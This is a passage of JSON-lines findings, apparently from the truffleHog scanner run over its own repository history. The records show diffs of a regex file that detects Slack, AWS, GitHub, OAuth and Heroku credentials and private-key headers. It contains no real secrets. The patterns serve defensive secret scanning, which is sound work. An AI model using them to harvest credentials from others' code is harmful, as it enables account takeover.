dev\n", "commitHash": "4e1884de29ccc5ca2a9a6c3c19fe912a4ae60ea1", "date": "2017-12-10 21:49:19", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge https://github.com/carnal0wnage/truffleHog-1 into dev\n", "commitHash": "4e1884de29ccc5ca2a9a6c3c19fe912a4ae60ea1", "date": "2017-12-10 21:49:19", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge https://github.com/carnal0wnage/truffleHog-1 into dev\n", "commitHash": "4e1884de29ccc5ca2a9a6c3c19fe912a4ae60ea1", "date": "2017-12-10 21:49:19", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "Add coverage\n", "commitHash": "bbb1392f94ddf21ae18bce19f63f5abb309657c7", "date": "2017-12-10 20:25:01", "diff": "@@ -2,13 +2,24 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Add coverage\n", "commitHash": "bbb1392f94ddf21ae18bce19f63f5abb309657c7", "date": "2017-12-10 20:25:01", "diff": "@@ -2,13 +2,24 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Add coverage\n", "commitHash": "bbb1392f94ddf21ae18bce19f63f5abb309657c7", "date": "2017-12-10 20:25:01", "diff": "@@ -2,13 +2,24 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Add coverage\n", "commitHash": "bbb1392f94ddf21ae18bce19f63f5abb309657c7", "date": "2017-12-10 20:25:01", "diff": "@@ -2,13 +2,24 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Add coverage\n", "commitHash": "bbb1392f94ddf21ae18bce19f63f5abb309657c7", "date": "2017-12-10 20:25:01", "diff": "@@ -2,13 +2,24 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "Update regexChecks.py", "commitHash": "b6073aafed119255301571cf8ff1ea43ede87c95", "date": "2017-12-08 17:38:45", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": 